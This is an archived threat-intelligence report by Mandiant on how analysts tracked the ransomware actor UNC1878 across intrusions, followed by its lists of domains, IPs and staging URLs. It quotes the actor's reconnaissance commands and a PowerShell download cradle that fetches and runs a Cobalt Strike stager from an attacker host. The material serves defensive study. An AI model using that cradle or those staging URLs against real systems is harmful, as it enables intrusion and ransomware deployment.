{ "id": "2348838a-435a-4abe-a70c-7c7554844ea0", "created_at": "2026-04-06T00:10:23.424089Z", "updated_at": "2026-04-10T03:33:27.400671Z", "deleted_at": null, "sha1_hash": "06a69fc41ca9910a185e596198003653835973a3", "title": "It's Your Money and They Want It Now — The Cycle of Adversary Pursuit | Mandiant", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 107526, "plain_text": "It's Your Money and They Want It Now — The Cycle of Adversary\r\nPursuit | Mandiant\r\nBy Mandiant\r\nPublished: 2020-03-31 · Archived: 2026-04-05 17:52:43 UTC\r\nWritten by: Van Ta, Aaron Stephens\r\nWhen we discover new intrusions, we ask ourselves questions that will help us understand the totality of the activity set.\r\nHow common is this activity? Is there anything unique or special about this malware or campaign? What is new and what is\r\nold in terms of TTPs or infrastructure? Is this being seen anywhere else? What information do I have that substantiates the\r\nnature of this threat actor?\r\nTo track a fast-moving adversary over time, we exploit organic intrusion data, pivot to other data sets, and make that\r\nknowledge actionable for analysts and incident responders, enabling new discoveries and assessments on the actor. The\r\nFireEye Advanced Practices team exists to know more about the adversary than anyone else, and by asking and answering\r\nquestions such as these, we enable analyst action in security efforts. In this blog post, we highlight how our cycle of\r\nidentification, expansion, and discovery was used to track a financially motivated actor across FireEye’s global data sets.\r\nIdentification\r\nOn January 29, 2020, FireEye Managed Defense investigated multiple TRICKBOT deployments against a U.S. based client.\r\nShortly after initial deployment, TRICKBOT’s networkDll module ran the following network reconnaissance commands\r\n(Figure 1).\r\nipconfig /all\r\nnet config workstation\r\nnet view /all\r\nnet view /all /domain\r\nnltest /domain_trusts\r\nnltest /domain_trusts /all_trusts\r\nFigure 1: Initial Reconnaissance\r\nApproximately twenty minutes after reconnaissance, the adversary ran a PowerShell command to download and execute a\r\nCobalt Strike HTTPS BEACON stager in memory (Figure 2).\r\ncmd.exe /c powershell.exe -nop –w hidden –c “IEX ((new-object\r\nnet.webclient).downloadstring(‘hxxps://cylenceprotect[.]com:80/abresgbserthgsbabrt’))”\r\nFigure 2: PowerShell download cradle used to request a Cobalt Strike stager\r\nSix minutes later, Managed Defense identified evidence of enumeration and attempted lateral movement through the\r\nBEACON implant. Managed Defense alerted the client of the activity and the affected hosts were contained, stopping the\r\nintrusion in its tracks. A delta of approximately forty-six minutes between a TRICKBOT infection and attempted lateral\r\nmovement was highly unusual and, along with the clever masquerade domain, warranted further examination by our team.\r\nAlthough light, indicators from this intrusion were distinct enough to create an uncategorized threat group, referred to as\r\nUNC1878. At the time of initial clustering, UNC1878’s intent was not fully understood due to the rapid containment of the\r\nintrusion by Managed Defense. By creating this label, we are able to link activity from the Managed Defense investigation\r\nhttps://www.fireeye.com/blog/threat-research/2020/03/the-cycle-of-adversary-pursuit.html\r\nPage 1 of 7\n\ninto a single entity, allowing us to expand our understanding of this group and track their activity over time. This is\r\nespecially important when dealing with campaigns involving mass malware, as it helps delineate the interactive actor from\r\nthe malware campaign they are leveraging. For more information on our clustering methodology, check out our post about\r\nhow we analyze, separate, or merge these clusters at scale.\r\nExpansion\r\nPivoting on the command and control (C2) domain allowed us to begin building a profile of UNC1878 network\r\ninfrastructure. WHOIS records for cylenceprotect[.]com (Figure 3) revealed that the domain was registered on January 27,\r\n2020, with the registrar \"Hosting Concepts B.V. d/b/a Openprovider\", less than two days before we saw this domain used in\r\nactivity impacting the Managed Defense customer.\r\nDomain Name: cylenceprotect.com\r\nRegistry Domain ID: 2485487352_DOMAIN_COM-VRSN\r\nRegistrar WHOIS Server: whois.registrar.eu\r\nRegistrar URL: http://www.registrar.eu\r\nUpdated Date: 2020-01-28T00:35:43Z\r\nCreation Date: 2020-01-27T23:32:18Z\r\nRegistrar Registration Expiration Date: 2021-01-27T23:32:18Z\r\nRegistrar: Hosting Concepts B.V. d/b/a Openprovider\r\nFigure 3: WHOIS record for the domain cylenceprotect[.]com\r\nTurning our attention to the server, the domain resolved to 45.76.20.140, an IP address owned by the VPS provider Choopa.\r\nIn addition, the domain used self-hosted name servers ns1.cylenceprotect[.]com and ns2.cylenceprotect[.]com, which also\r\nresolved to the Choopa IP address. Network scan data for the server uncovered a certificate on port 80 and 443, a snippet of\r\nwhich can be seen in Figure 4.\r\nCertificate:\r\n Data:\r\n Version: 3 (0x2)\r\n Serial Number:\r\n 03:a8:60:02:c7:dd:7f:88:5f:2d:86:0d:88:41:e5:3e:25:f0\r\n Signature Algorithm: sha256WithRSAEncryption\r\n Issuer: C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3\r\n Validity\r\n Not Before: Jan 28 02:02:14 2020 GMT\r\n Not After : Apr 27 02:02:14 2020 GMT\r\n Subject: CN=cylenceprotect[.]com\r\nFigure 4: TLS Certificate for the domain cylenceprotect[.]com\r\nThe certificate was issued by Let’s Encrypt, with the earliest validity date within 24 hours of the activity detected by\r\nManaged Defense, substantiating the speed in which this threat actor operates. Along with the certificate in Figure 4, we also\r\nidentified the default generated, self-signed Cobalt Strike certificate (Figure 5) on port 54546 (50050 by default).\r\nCertificate:\r\n Data:\r\n Version: 3 (0x2)\r\n Serial Number: 1843990795 (0x6de9110b)\r\n Signature Algorithm: sha256WithRSAEncryption\r\n Issuer: C=Earth, ST=Cyberspace, L=Somewhere, O=cobaltstrike, OU=AdvancedPenTesting, CN=Major Cobalt Strike\r\n Validity\r\n Not Before: Jan 28 03:06:30 2020 GMT\r\nhttps://www.fireeye.com/blog/threat-research/2020/03/the-cycle-of-adversary-pursuit.html\r\nPage 2 of 7\n\nNot After : Apr 27 03:06:30 2020 GMT\r\n Subject: C=Earth, ST=Cyberspace, L=Somewhere, O=cobaltstrike, OU=AdvancedPenTesting, CN=Major Cobalt Strike\r\nFigure 5: Default Cobalt Strike TLS Certificate used by UNC1878\r\nSimilar to the certificate on port 80 and 443, the earliest validity date was again within 24 hours of the intrusion identified\r\nby Managed Defense. Continuing analysis on the server, we acquired the BEACON stager and subsequent BEACON\r\npayload, which was configured to use the Amazon malleable C2 profile.\r\nWhile these indicators may not hold significant weight on their own, together they create a recognizable pattern to fuel\r\nproactive discovery of related infrastructure. We began hunting for servers that exhibited the same characteristics as those\r\nused by UNC1878. Using third-party scan data, we quickly identified additional servers that matched a preponderance of\r\nUNC1878 tradecraft:\r\nDomains typically comprised of generic IT or security related terms such as “update”, “system”, and “service”.\r\nDomains registered with “Hosting Concepts B.V. d/b/a Openprovider\" as early as December 19, 2019.\r\nSelf-hosted name servers.\r\nLet’s Encrypt certificates on port 80.\r\nVirtual private servers hosted predominantly by Choopa.\r\nBEACON payloads configured with the Amazon malleable C2 profile.\r\nCobalt Strike Teams Servers on non-standard ports.\r\nAlong with certificates matching UNC1878 tradecraft, we also found self-signed Armitage certificates, indicating this group\r\nmay use multiple offensive security tools.\r\nPivoting on limited indicators extracted from a single Managed Defense intrusion, a small cluster of activity was expanded\r\ninto a more diverse set of indicators cardinal to UNC1878. While the objective and goal of this threat actor had not yet\r\nmanifested, the correlation of infrastructure allowed our team to recognize this threat actor’s operations against other\r\ncustomers.\r\nDiscovery\r\nWith an established modus operandi for UNC1878, our team quickly identified several related intrusions in support of\r\nFireEye Mandiant investigations over the next week. Within two days of our initial clustering and expansion of UNC1878\r\nfrom the original Managed Defense investigation, Mandiant Incident Responders were investigating activity at a U.S. based\r\nmedical equipment company with several indicators we had previously identified and attributed to UNC1878. Attributed\r\ndomains, payloads and methodologies provided consultants with a baseline to build detections on, as well as a level of\r\nconfidence in the actor’s capabilities and speed in which they operate.\r\nThree days later, UNC1878 was identified during another incident response engagement at a restaurant chain. In this\r\nengagement, Mandiant consultants found evidence of attempted deployment of RYUK ransomware on hundreds of systems,\r\nfinally revealing UNC1878’s desired end goal. In the following weeks, we continued to encounter UNC1878 in various\r\nphases of their intrusions at several Mandiant Incident Response and Managed Defense customers.\r\nWhile services data offers us a depth of understanding into these intrusions, we turn to our product telemetry to understand\r\nthe breadth of activity, getting a better worldview and perspective on the global prevalence of this threat actor. This led to\r\nthe discovery of an UNC1878 intrusion at a technology company, resulting in Mandiant immediately notifying the affected\r\ncustomer. By correlating multiple UNC1878 intrusions across our services and product customers, it became evident that the\r\ntargeting was indiscriminate, a common characteristic of opportunistic ransomware campaigns.\r\nAlthough initially there were unanswered questions surrounding UNC1878’s intent, we were able to provide valuable\r\ninsights into their capabilities to our consultants and analysts. In turn, the intrusion data gathered during these engagements\r\ncontinued the cycle of building our understanding of UNC1878’s tradecraft, enabling our responders to handle these\r\nincidents swiftly in the face of imminent ransomware deployment.\r\nhttps://www.fireeye.com/blog/threat-research/2020/03/the-cycle-of-adversary-pursuit.html\r\nPage 3 of 7\n\nConclusion\r\nThreat actors continue to use mass malware campaigns to establish footholds into target environments, followed by\r\ninteractive operations focused on deploying ransomware such as RYUK, DOPPLEPAYMER and MAZE. Looking at the\r\noverall trend of intrusions FireEye responds to, the growing shift from traditional PCI theft to ransomware has allowed\r\nthreat actors such as UNC1878 to widen their scope and increase their tempo, costing organizations millions of dollars due\r\nto business disruption and ransom payments. However, apart from their speed, UNC1878 does not stand out among the\r\nincreasing number of groups following this trend, and should not be the key takeaway of this blog post.\r\nThe cycle of analysis and discovery used for UNC1878 lies at the core of our team’s mission to rapidly detect and pursue\r\nimpactful adversaries at scale. Starting from a singular intrusion at a Managed Defense client, we were able to discover\r\nUNC1878 activity at multiple customers. Using our analysis of the early stages of their activity allowed us to pivot and\r\npursue this actor across otherwise unrelated investigations. As we refine and expand our understanding of UNC1878’s\r\ntradecraft, our team enables Mandiant and Managed Defense to efficiently identify, respond to, and eradicate a financially\r\nmotivated threat actor whose end goal could cripple targeted organizations. The principles applied in pursuit of this actor are\r\ncrucial to tracking any adversary and are ultimately how the Advanced Practices team surfaces meaningful activity across\r\nthe FireEye ecosystem.\r\nAcknowledgements\r\nThank you to Andrew Thompson, Dan Perez, Steve Miller, John Gorman and Brendan McKeague for technical review of\r\nthis content. In addition, thank you to the frontline responders harvesting valuable intrusion data that enables our research.\r\nIndicators of Compromise\r\nDomains\r\naaatus[.]com\r\navrenew[.]com\r\nbesttus[.]com\r\nbigtus[.]com\r\nbrainschampions[.]com\r\ncheckwinupdate[.]com\r\nciscocheckapi[.]com\r\ncleardefencewin[.]com\r\ncmdupdatewin[.]com\r\ncomssite[.]com\r\nconhostservice[.]com\r\ncylenceprotect[.]com\r\ndefenswin[.]com\r\neasytus[.]com\r\nfindtus[.]com\r\nfirsttus[.]com\r\nfreeallsafe[.]com\r\nfreeoldsafe[.]com\r\ngreattus[.]com\r\nhavesetup[.]net\r\niexploreservice[.]com\r\njomamba[.]best\r\nlivecheckpointsrs[.]com\r\nlivetus[.]com\r\nlsassupdate[.]com\r\nlsasswininfo[.]com\r\nhttps://www.fireeye.com/blog/threat-research/2020/03/the-cycle-of-adversary-pursuit.html\r\nPage 4 of 7\n\nmicrosoftupdateswin[.]com\r\nmyservicebooster[.]com\r\nmyservicebooster[.]net\r\nmyserviceconnect[.]net\r\nmyserviceupdater[.]com\r\nmyyserviceupdater[.]com\r\nrenovatesystem[.]com\r\nservice-updater[.]com\r\nservicesbooster[.]com\r\nservicesbooster[.]org\r\nservicesecurity[.]org\r\nserviceshelpers[.]com\r\nserviceupdates[.]net\r\nserviceuphelper[.]com\r\nsophosdefence[.]com\r\ntarget-support[.]online\r\ntaskshedulewin[.]com\r\ntimesshifts[.]com\r\ntopsecurityservice[.]net\r\ntopservicehelper[.]com\r\ntopservicesbooster[.]com\r\ntopservicesecurity[.]com\r\ntopservicesecurity[.]net\r\ntopservicesecurity[.]org\r\ntopservicesupdate[.]com\r\ntopservicesupdates[.]com\r\ntopserviceupdater[.]com\r\nupdate-wind[.]com\r\nupdatemanagir[.]us\r\nupdatewinlsass[.]com\r\nupdatewinsoftr[.]com\r\nweb-analysis[.]live\r\nwindefenceinfo[.]com\r\nwindefens[.]com\r\nwinsysteminfo[.]com\r\nwinsystemupdate[.]com\r\nworldtus[.]com\r\nyoursuperservice[.]com\r\nIP Addresses\r\n31.7.59.141\r\n45.32.30.162\r\n45.32.130.5\r\n45.32.161.213\r\n45.32.170.9\r\n45.63.8.219\r\n45.63.95.187\r\n45.76.20.140\r\n45.76.167.35\r\n45.76.231.195\r\n45.77.58.172\r\nhttps://www.fireeye.com/blog/threat-research/2020/03/the-cycle-of-adversary-pursuit.html\r\nPage 5 of 7\n\n45.77.89.31\r\n45.77.98.157\r\n45.77.119.212\r\n45.77.153.72\r\n45.77.206.105\r\n63.209.33.131\r\n66.42.97.225\r\n66.42.99.79\r\n79.124.60.117\r\n80.240.18.106\r\n81.17.25.210\r\n95.179.147.215\r\n95.179.210.8\r\n95.179.215.228\r\n96.30.192.141\r\n96.30.193.57\r\n104.156.227.250\r\n104.156.245.0\r\n104.156.250.132\r\n104.156.255.79\r\n104.238.140.239\r\n104.238.190.126\r\n108.61.72.29\r\n108.61.90.90\r\n108.61.176.237\r\n108.61.209.123\r\n108.61.242.184\r\n140.82.5.67\r\n140.82.10.222\r\n140.82.27.146\r\n140.82.60.155\r\n144.202.12.197\r\n144.202.83.4\r\n149.28.15.247\r\n149.28.35.35\r\n149.28.50.31\r\n149.28.55.197\r\n149.28.81.19\r\n149.28.113.9\r\n149.28.122.130\r\n149.28.246.25\r\n149.248.5.240\r\n149.248.56.113\r\n149.248.58.11\r\n151.106.56.223\r\n155.138.135.182\r\n155.138.214.247\r\n155.138.216.133\r\n155.138.224.221\r\n207.148.8.61\r\n207.148.15.31\r\nhttps://www.fireeye.com/blog/threat-research/2020/03/the-cycle-of-adversary-pursuit.html\r\nPage 6 of 7\n\n207.148.21.17\r\n207.246.67.70\r\n209.222.108.106\r\n209.250.255.172\r\n216.155.157.249\r\n217.69.15.175\r\nBEACON Staging URLs\r\nhxxp://104.156.255[.]79:80/avbcbgfyhunjmkmk\r\nhxxp://149.28.50[.]31:80/adsrxdfcffdxfdsgfxzxds\r\nhxxp://149.28.81[.]19:80/ajdlkashduiqwhuyeu12312g3yugshdahqjwgye1g2uy31u1\r\nhxxp://45.32.161[.]213:80/ephfusaybuzabegaexbkakskjfgksajgbgfckskfnrdgnkhdsnkghdrngkhrsngrhgcngyggfxbgufgenwfxwgfeu\r\nhxxp://45.63.8[.]219:80/ajhgfrtyujhytr567uhgfrt6y789ijhg\r\nhxxp://66.42.97[.]225:80/aqedfy345yu9876red45f6g78j90\r\nhxxp://findtus[.]com/akkhujhbjcjcjhufuuljlvu\r\nhxxp://thedemocraticpost[.]com/kflmgkkjdfkmkfl\r\nhxxps://brainschampions[.]com:443/atrsgrtehgsetrh5ge\r\nhxxps://ciscocheckapi[.]com:80/adsgsergesrtvfdvsa\r\nhxxps://cylenceprotect[.]com:80/abresgbserthgsbabrt\r\nhxxps://havesetup[.]net/afgthyjuhtgrfety\r\nhxxps://servicesbooster[.]org:443/sfer4f54\r\nhxxps://servicesecurity[.]org:443/fuhvbjk\r\nhxxps://timesshifts[.]com:443/akjhtyrdtfyguhiugyft\r\nhxxps://timesshifts[.]com:443/ry56rt6yh5rth\r\nhxxps://update-wind[.]com/aergerhgrhgeradgerg\r\nhxxps://updatemanagir[.]us:80/afvSfaewfsdZFAesf\r\nPosted in\r\nThreat Intelligence\r\nSecurity \u0026 Identity\r\nSource: https://www.fireeye.com/blog/threat-research/2020/03/the-cycle-of-adversary-pursuit.html\r\nhttps://www.fireeye.com/blog/threat-research/2020/03/the-cycle-of-adversary-pursuit.html\r\nPage 7 of 7", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "Malpedia" ], "references": [ "https://www.fireeye.com/blog/threat-research/2020/03/the-cycle-of-adversary-pursuit.html" ], "report_names": [ "the-cycle-of-adversary-pursuit.html" ], "threat_actors": [ { "id": "12211366-1f14-4eed-9d91-46b6a2ede618", "created_at": "2025-08-07T02:03:25.014713Z", "updated_at": "2026-04-10T02:00:03.624097Z", "deleted_at": null, "main_name": "GOLD ULRICK", "aliases": [ "Grim Spider ", "UNC1878 " ], "source_name": "Secureworks:GOLD ULRICK", "tools": [ "Bloodhound", "Buer Loader", "Cobalt Strike", "Conti", "Diavol", "PowerShell Empire", "Ryuk", "SystemBC", "Team9 (aka BazarLoader)", "TrickBot" ], "source_id": "Secureworks", "reports": null }, { "id": "ab9d6b30-7c60-4d0b-8f49-e2e913c28508", "created_at": "2022-10-25T16:07:24.584775Z", "updated_at": "2026-04-10T02:00:05.042135Z", "deleted_at": null, "main_name": "UNC1878", "aliases": [], "source_name": "ETDA:UNC1878", "tools": [ "Agentemis", "BEERBOT", "BazarBackdoor", "BazarCall", "BazarLoader", "Cobalt Strike", "CobaltStrike", "KEGTAP", "Ryuk", "Team9Backdoor", "bazaloader", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "0a4f4edc-ea8c-4a30-8ded-35394e29de01", "created_at": "2023-01-06T13:46:39.178183Z", "updated_at": "2026-04-10T02:00:03.23716Z", "deleted_at": null, "main_name": "UNC1878", "aliases": [], "source_name": "MISPGALAXY:UNC1878", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "63061658-5810-4f01-9620-7eada7e9ae2e", "created_at": "2022-10-25T15:50:23.752974Z", "updated_at": "2026-04-10T02:00:05.244531Z", "deleted_at": null, "main_name": "Wizard Spider", "aliases": [ "Wizard Spider", "UNC1878", "TEMP.MixMaster", "Grim Spider", "FIN12", "GOLD BLACKBURN", "ITG23", "Periwinkle Tempest", "DEV-0193" ], "source_name": "MITRE:Wizard Spider", "tools": [ "TrickBot", "AdFind", "BITSAdmin", "Bazar", "LaZagne", "Nltest", "GrimAgent", "Dyre", "Ryuk", "Conti", "Emotet", "Rubeus", "Mimikatz", "Diavol", "PsExec", "Cobalt Strike" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434223, "ts_updated_at": 1775792007, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/06a69fc41ca9910a185e596198003653835973a3.pdf", "text": "https://archive.orkl.eu/06a69fc41ca9910a185e596198003653835973a3.txt", "img": "https://archive.orkl.eu/06a69fc41ca9910a185e596198003653835973a3.jpg" } }